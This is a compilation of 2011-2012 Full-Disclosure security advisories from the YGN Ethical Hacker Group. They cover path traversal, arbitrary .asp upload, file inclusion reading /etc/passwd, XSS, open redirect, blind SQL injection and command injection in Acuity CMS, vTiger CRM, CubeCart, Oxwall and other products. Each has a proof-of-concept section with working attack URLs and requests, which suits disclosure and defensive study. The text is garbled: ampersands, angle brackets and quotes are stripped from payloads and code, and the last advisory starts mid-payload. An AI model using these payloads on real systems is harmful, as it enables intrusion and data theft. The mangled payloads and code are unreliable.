1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is due to the script, /admin/file_manager/browse.asp, not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../) supplied via the 'path' parameter. It would allow the attacker to access arbitrary files outside of web root directory. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/admin/file_manager/browse.asp?field=form=path=../../ 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_path_traversal #yehg [2012-05-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Acuity CMS 2.6.x = Arbitrary File Upload
1. OVERVIEW Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an attacker to upload .asp/.aspx files without restrictions, which will execute ASP(.Net) codes. The issue is due to the script, /admin/file_manager/file_upload_submit.asp , not properly sanitizing 'file1', 'file2', 'file3', 'fileX' parameters. 4. VERSIONS AFFECTED Tested with version 2.6.2. 5. PROOF-OF-CONCEPT/EXPLOIT [REQUEST] POST /admin/file_manager/file_upload_submit.asp HTTP/1.1 Host: localhost Cookie: ASPSESSIONID=XXX -6dc3a236402e2 Content-Disposition: form-data; name=path /images -6dc3a236402e2 Content-Disposition: form-data; name=rootpath / -6dc3a236402e2 Content-Disposition: form-data; name=rootdisplay http://localhost/ -6dc3a236402e2 Content-Disposition: form-data; name=status confirmed -6dc3a236402e2 Content-Disposition: form-data; name=action fileUpload -6dc3a236402e2 Content-Disposition: form-data; name=file1; filename=0wned.asp Content-Type: application/octet-stream % response.write(0wned!) % -6dc3a236402e2-- [/REQUEST] 6. SOLUTION The Acunity CMS is no longer in active development. It is recommended to user another CMS in active development and support. 7. VENDOR The Collective http://www.thecollective.com.au/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-05-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload #yehg [2012-05-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FastPath Webchat | Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW Fastpath WebChat is vulnerable to Cross Site Scripting. 2. BACKGROUND Fastpath WebChat is part of the Fastpath product. It provides a way for users to begin chatting with support agents using Fastpath. Fastpath is a plugin of OpenFire, a real time collaboration (RTC) server for instant messaging. Fastpath provides queuing and routing for instant messaging to intelligently link people together. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 4.0.0 (released date: Aug 5, 2008) 5. VULNERABLE PARAMETERS File: webapp/agentinfo.jsp Parameters: agentName, emailValue, jid, nameValue, title File: webapp/chat-ended.jsp Parameter: workgroup File: webapp/chatmain.jsp Parameters: chatID, workgroup File: webapp/chatroom.jsp Parameters: email, jid, userNickname, question File: webapp/contact-agent.jsp Parameter: email File: webapp/email/leave-a-message.jsp Parameter: workgroup File: webapp/email/offline-mail.jsp Parameter: workgroup File: webapp/queue_updater.jsp Parameters: chatID, workgroup File: webapp/style.jsp Parameter: workgroup File: webapp/transcriptmain.jsp Parameters: chatID, workgroup File: webapp/transcriptsrc.jsp Parameters: from, text 6. SOLUTION Fastpath WebChat is no longer in active development. Ref: http://www.igniterealtime.org/projects/openfire/plugins.jsp Ref: http://fisheye.igniterealtime.org/browse/svn-org/openfire/trunk/src/plugins/fastpath/src/web 7. VENDOR Jive Software http://www.jivesoftware.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-04-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bfastpath-webchat%5D_multiple_cross_site_scripting What XSS Can Do: http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf XSS FAQs: http://www.cgisecurity.com/articles/xss-faq.shtml XSS (wiki): http://en.wikipedia.org/wiki/Cross-site_scripting XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project CWE-79: http://cwe.mitre.org/data/definitions/79.html #yehg [2012-04-15] - Best regards, YGN Ethical Hacker Group Yangon, Myanmar http://yehg.net Our Lab | http://yehg.net/lab Our Directory | http://yehg.net/hwd ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Joomla! Plugin - Beatz 1.x = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
Beatz 1.x versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.
4. VERSIONS AFFECTED
Tested in 1.x versions
5. PROOF-OF-CONCEPT/EXPLOIT
== Generic Joomla! 1.5 Double Encoding XSS
http://localhost/beatz/?option=com_contentview=frontpagelimitstart=5%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
== com_charts (parameter: do)
http://localhost/beatz/index.php?option=com_chartsview=chartsItemid=76chartkeyword=Acousticdo=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%22option=com_charts
== com_find (parameter: keyword)
http://localhost/beatz/index.php?do=listAllkeyword=++Search;img+src=0+onerror=prompt(/XSS/)option=com_find
== com_videos (parameter: video_keyword)
http://localhost/beatz/index.php?option=com_videosview=videosItemid=59video_keyword=+style=width:1000px;height:1000px;position:absolute;left:0;top:0+onmouseover=alert(/xss/)search=Search
6. SOLUTION
The vendor hasn't released the fixed yet.
7. VENDOR
Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-03-01: notified vendor
2012-04-15: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
#yehg [2012-04-15]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) = select_users_template Local File Inclusion Vulnerability
1. OVERVIEW
Open-Realty 2.5.8 and lower versions are vulnerable to Local File Inclusion.
2. BACKGROUND
Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.
3. VULNERABILITY DESCRIPTION
Open-Realty contains a flaw that may allow a remote attacker to
execute arbitrary commands or code. The issue is due to the
'index.php' script not properly sanitizing user input, specifically
directory traversal style attacks (e.g., ../../) supplied to the
'select_users_template' parameter. This may allow an attacker to
include a file from the targeted host that contains arbitrary commands
or code that will be executed by the vulnerable script. Such attacks
are limited due to the script only calling files already on the target
host. In addition, this flaw can potentially be used to disclose the
contents of any file on the system accessible by the web server.
4. VERSIONS AFFECTED
2.5.8 (2.x.x) =
5. PROOF-OF-CONCEPT/EXPLOIT
http://localhost/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00
6. SOLUTION
The version 2.5.x version family is no longer maintained by the vendor.
The version 3.x.x is not found to be vulnerable to this issue. Upgrade
to the latest 3.x.x version.
7. VENDOR
Transparent Technologies Inc.
http://www.transparent-support.com
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance circle
2012-03-05: Vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_lfi
Open-Realty Home Page: http://www.open-realty.org/
CWE-98: Improper Control of Filename for Include/Require Statement in
PHP Program ('PHP File Inclusion')
CAPEC-252: PHP Local File Inclusion
#yehg [2012-03-05]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Etano 1.x = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW Etano 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND The community builder script we provide - Etano - was built entirely based on requests from customers of our previous dating package (Dating Site Builder). Almost every feature ever requested was built into Etano to help you build a better site for your community members. You can use Etano to start up a dating site, a social networking site, a classifieds site or any other type of site involving groups of people, companies, products. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission to join.php, search.php, photo_search.php and photo_view.php , which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested in 1.x versions (1.20-1.22) 5. PROOF-OF-CONCEPT/EXPLOIT URL: http://localhost/etano/join.php Method: POST Vulnerable Parameters: user, email, email2, f17_zip, agree URL: http://localhost/etano/search.php Method: GET Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country , f17_state, f17_zip, f19, wphoto, search, v, return http://localhost/etano/search.php?'scriptalert(/XSS/)/script http://localhost/etano/search.php?st='scriptalert(/XSS/)/script http://localhost/etano/search.php?f17_city='scriptalert(/XSS/)/scriptf17_country=0f17_state=0f17_zip=3f19=0st=basicwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country='scriptalert(/XSS/)/scriptf17_state=0f17_zip=3f19=0st=basicwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country=0f17_state='scriptalert(/XSS/)/scriptf17_zip=3f19=0st=basicwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip='scriptalert(/XSS/)/scriptf19=0st=basicwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19='scriptalert(/XSS/)/scriptst=basicwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19=0st='scriptalert(/XSS/)/scriptwphoto=1 http://localhost/etano/search.php?f17_city=0f17_country=0f17_state=0f17_zip=3f19=0st=basicwphoto='scriptalert(/XSS/)/script http://localhost/etano/search.php?search='scriptalert(/XSS/)/scriptv=g http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6v='scriptalert(/XSS/)/script http://localhost/etano/search.php?st=xss;scriptalert(/XSS/)/scriptuser=unknown URL: http://localhost/etano/photo_search.php Method: GET Vulnerable Parameters: QUERY STRING, st, return http://localhost/etano/photo_search.php?'scriptalert(/XSS/)/script http://localhost/etano/photo_search.php?st='scriptalert(/XSS/)/script URL: http://localhost/etano/photo_view.php Method: GET Vulnerable Parameter: return http://localhost/etano/photo_view.php?photo_id=1return=;scriptalert(/XSS/)/script 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Datemill http://www.datemill.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-21: notified vendor 2012-03-05: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss #yehg [2012-03-05] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OxWall 1.1.1 = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.
2. BACKGROUND
Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
4. VERSIONS AFFECTED
1.1.1 and lower
5. PROOF-OF-CONCEPT/EXPLOIT
URL: http://localhost/Oxwall/join
Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name ,password
,realname ,repeatPassword ,username
URL: http://localhost/Oxwall/contact
Injected Attack String: 'scriptalert(/XSS/)/script
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name ,from , subject
URL:
http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag
Vulnerable Parameter: RAW-URI
http://localhost/Oxwall/photo/viewlist/tagged/img src=xs onerror=alert('XSS')
http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
6. SOLUTION
Upgade to the latest version of Oxwall.
7. VENDOR
Oxwall Foundation
http://www.oxwall.org/
8. CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-06-09: notified vendor
2012-02-20: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: http://www.oxwall.org/
#yehg [2012-02-20]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Dolphin 7.0.7 = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Dolphin is the only all-in-one free community software platform for creating your own social networking, community or online dating site without any limits and under your full control. Dolphin comes with hundreds of features, module plugins and tools. Everything is included and extension posibilities are literally endless. You can use it for free with a BoonEx link in the footer or buy a $99 permanent license to remove that requirement. 3. VULNERABILITY DESCRIPTION Multiple parameters (explain,photos_only,online_only,mode) were not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED 7.0.7 and lower 5. PROOF-OF-CONCEPT/EXPLOIT Vulnerable Parameter: explain http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E Vulnerable Parameters: photos_only,online_only,mode http://localhost/dolph/viewFriends.php?iUser=1page=1per_page=32sort=activityphotos_only='scriptalert(/xss/)/script http://localhost/dolph/viewFriends.php?iUser=1page=1per_page=32sort=activityonline_only='scriptalert(/xss/)/script http://localhost/dolph/viewFriends.php?iUser=1page=1sort=activitymode='scriptalert(/xss/)/script 6. SOLUTION Upgade to the latest version of Dolphine. 7. VENDOR BoonEx Pty Ltd http://www.boonex.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-09: notified vendor 2011-10-24: fixed version, 7.0.8, released 2012-02-20: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss BoonEx Home Page: http://www.boonex.com/ #yehg [2012-02-20] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability [Updated]
1. OVERVIEW The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION The CubeCart 3.0.20 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the parameters,goto, r and redir. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choice. 4. VERSIONS AFFECTED 3.0.20 and lower (aka 3.0.x family) 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/cube3.0.20/switch.php?r=//yehg.net/lang=es http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net http://localhost/cube/index.php?act=loginredir=Ly95ZWhnLm5ldC8%3D http://localhost/cube/cart.php?act=regredir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-02-10: Vulnerability disclosed 2012-02-19: Vulnerability updated 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection CubeCart Home Page: http://cubecart.com/ OWASP Top 10 2010 - A 10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards SANS Top 25: http://cwe.mitre.org/top25/#CWE-601 CWE-601: http://cwe.mitre.org/data/definitions/601.html 11. CHANGE LOG This advisory was updated on 2012-02-19 with one additional vulnerable parameter, redir. #yehg [2012-02-10] last updated: 2012-02-19 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Open URL Redirection Vulnerability
1. OVERVIEW The CubeCart 3.0.20 and lower versions are vulnerable to Open URL Redirection. 2. BACKGROUND CubeCart is an out of the box ecommerce shopping cart software solution which has been written to run on servers that have PHP MySQL support. With CubeCart you can quickly setup a powerful online store which can be used to sell digital or tangible products to new and existing customers all over the world. 3. VULNERABILITY DESCRIPTION The CubeCart 3.0.20 and lower versions contain a flaw that allows a remote cross site redirection attack. This flaw exists because the application does not properly sanitise the parameters,goto and r. This allows an attacker to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site (domain.com) to an arbitrary web site (localhost) of the attacker's choice. 4. VERSIONS AFFECTED 3.0.20 and lower (aka 3.0.x family) 5. PROOF-OF-CONCEPT/EXPLOIT http://localhost/cube3.0.20/switch.php?r=//yehg.net/lang=es http://localhost/cube3.0.20/admin/login.php?goto=//yehg.net 6. SOLUTION The CubeCart 3.0.x version family is no longer maintained by the vendor. Upgrade to CubeCart 4x/5.x. 7. VENDOR CubeCart Development Team http://cubecart.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle 2012-02-10: Vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[cubecart_3.0.20_3.0.x]_open_url_redirection CubeCart Home Page: http://cubecart.com/ OWASP Top 10 2010 - A 10: http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards SANS Top 25: http://cwe.mitre.org/top25/#CWE-601 CWE-601: http://cwe.mitre.org/data/definitions/601.html #yehg [2012-02-10] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] zFtp Server = 2011-04-13 | STAT, CWD Remote Denial of Service Vulnerability
zFtp Server = 2011-04-13 | STAT,CWD Remote Denial of Service Vulnerability 1. OVERVIEW The zFTP server is found to be vulnerable to denial of service in handling multiple STAT and CWD command requests. 2. BACKGROUND The zFTP server is a Windows based FTP server with focus on clever Active Directory integration and powerful, effortless administration. 3. VERSIONS AFFECTED 2011-04-13 and earlier 4. PROOF-OF-CONCEPT/EXPLOIT http://www.exploit-db.com/exploits/18028/ 5. SOLUTION The vendor has released the patched version (http://download.zftpserver.com/zFTPServer_Suite_Setup.exe) 6. VENDOR Vastgota-Data 7. CREDIT This vulnerability was discovered by Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 8. DISCLOSURE TIME-LINE 2011-06-19: notified vendor through email 2011-10-17: vendor released fixed version, 2011-10-17 2011-10-25: vulnerability disclosed 9. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/%5Bzftpserver_2011-04-13%5D_stat,cwd_dos zFTP Server Home Page: http://zftpserver.com #yehg [2011-10-25] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] vTiger CRM 5.2.x = Remote Code Execution Vulnerability
vTiger CRM 5.2.x = Remote Code Execution Vulnerability
1. OVERVIEW
The vTiger CRM 5.2.1 and lower versions are vulnerable to Remote Code
Execution. No fixed version has been released as of 2011-10-05.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries. It has a vibrant community of users driving the product
forward, and contributing to it's development. Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.
3. VULNERABILITY DESCRIPTION
vTiger uses the vulnerable version of phpmailer class file located at
/cron/class.phpmailer.php .
4. VERSIONS AFFECTED
Tested on 5.2.1
5. PROOF-OF-CONCEPT/EXPLOIT
File: /cron/class.phpmailer.php
[code]
391:function SendmailSend($header, $body) {
392:if ($this-Sender != )
393: $sendmail = sprintf(%s -oi -f %s -t, $this-Sendmail,
$this-Sender);
394:else
395: $sendmail = sprintf(%s -oi -t, $this-Sendmail);
[/code]
6. SOLUTION
The vendor hasn't attempted to incorporate the latest version of
phpMailer class in their vTigerCRM as of version 5.2.1.
The flawed code portion can be patched with:
393: $sendmail = sprintf(%s -oi -f %s -t,
escapeshellcmd($this-Sendmail), escapeshellarg($this-Sender));
395: $sendmail = sprintf(%s -oi -t, escapeshellcmd($this-Sendmail));
7. VENDOR
vTiger Development Team
http://www.vtiger.com/
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2010-12-08: notified vendor
2011-10-05: no fixed version released yet
2011-10-05: vulnerability disclosed
10. REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_rce
Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3215
#yehg [2011-10-05]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] vTiger CRM 5.2.x = Blind SQL Injection Vulnerability
vTiger CRM 5.2.x = Blind SQL Injection Vulnerability 1. OVERVIEW The vTiger CRM 5.2.1 and lower versions are vulnerable to Blind SQL Injection. No fixed version has been released as of 2011-10-05. 2. BACKGROUND vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal for small and medium businesses, with low-cost product support available to production users that need reliable support. vtiger CRM is a widely used product with thousands of users in dozens of countries. It has a vibrant community of users driving the product forward, and contributing to it's development. Over 2 million copies of vtiger CRM have been downloaded so far. It was launched as a fork of version 1.0 of the SugarCRM project launched on December 31st, 2004. 3. VULNERABILITY DESCRIPTION The onlyforuser parameter was not properly sanitized, which allows attacker to conduct Blind SQL Injection Attack. This could an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. 4. VERSIONS AFFECTED Tested on 5.2.1 5. PROOF-OF-CONCEPT/EXPLOIT A future calendar event must be created in advance to trigger this vulnerability. Verified with Simple 1=1 Boolean check - /index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+1%3d1-- /index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+1%3d2-- Verified with MySQL @@version check - /index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+@@version%3d5-- /index.php?action=indexmodule=Calendarview=weekhour=0day=5month=12year=2011viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1+or+@@version%3d4-- 6. SOLUTION No patched version is available yet. The vendor hasn't attempted to fix the issues though they acknowledged the report. 7. VENDOR vTiger Development Team http://www.vtiger.com/ 8. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2010-12-08: notified vendor 2011-10-05: no fixed version released yet 2011-10-05: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5BvTiger_5.2.1%5D_blind_sqlin Wiki VtigerCRM: https://secure.wikimedia.org/wikipedia/en/wiki/Vtiger_CRM #yehg [2011-10-05] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] vTiger CRM 5.2.x = Multiple Cross Site Scripting Vulnerabilities
%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27parenttab=Myonlyforuser=1
Parameter: type
Note: Move your mouse over the texts Potential No., Potential Name,..etc
/index.php?module=Potentialsaction=ListViewsales_stage=Prospectingclosingdate_start=2001-01-01closingdate_end=2100-01-01query=truetype=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27owner=adminviewname=10
Parameter: view
/index.php?action=indexmodule=Calendarview=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22hour=0day=5month=9year=2010viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1
Parameter: viewOption
/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=9year=2010viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22subtab=eventparenttab=Myonlyforuser=1
Parameter: viewname
/index.php?module=Calendaraction=CalendarAjaxfile=ListViewajax=changestateviewname=10'%20onmouseover=alert(/XSS/)%20x='errormsg=
Browser: IE 6, IE 7, FF 4
XSS in Hidden Input Tag
Parameter: activity_mode
Note: For this example, record id 116 needs to exist
/index.php?action=DetailViewmodule=Calendarrecord=116activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22Xparenttab=My
Parameter: display_view
/index.php?module=Dashboardaction=indexdisplay_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22Xpbss_edit=true
Parameter: folderid
/index.php?module=Reportsaction=SaveAndRunrecord=1folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X
Parameter: groupId
/index.php?module=Settingsaction=createnewgroupreturnaction=listgroupsparenttab=Settingsmode=editgroupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X
Parameter: mode
/index.php?module=Settingsaction=createroleroleid=H2parenttab=Settingsmode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22X
Parameter: parent
index.php?module=Settingsaction=createroleparenttab=Settingsparent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
Parameter: profile_id
/index.php?module=Settingsaction=profilePrivilegesparenttab=Settingsprofileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3dmode=view
Parameter: return_action
/index.php?module=Campaignsaction=EditViewrecord=124return_module=Campaignsreturn_action=index%20style%3dx%3aexpression(alert(1))%20x=sparenttab=Marketingreturn_viewname=29
Parameter: return_module
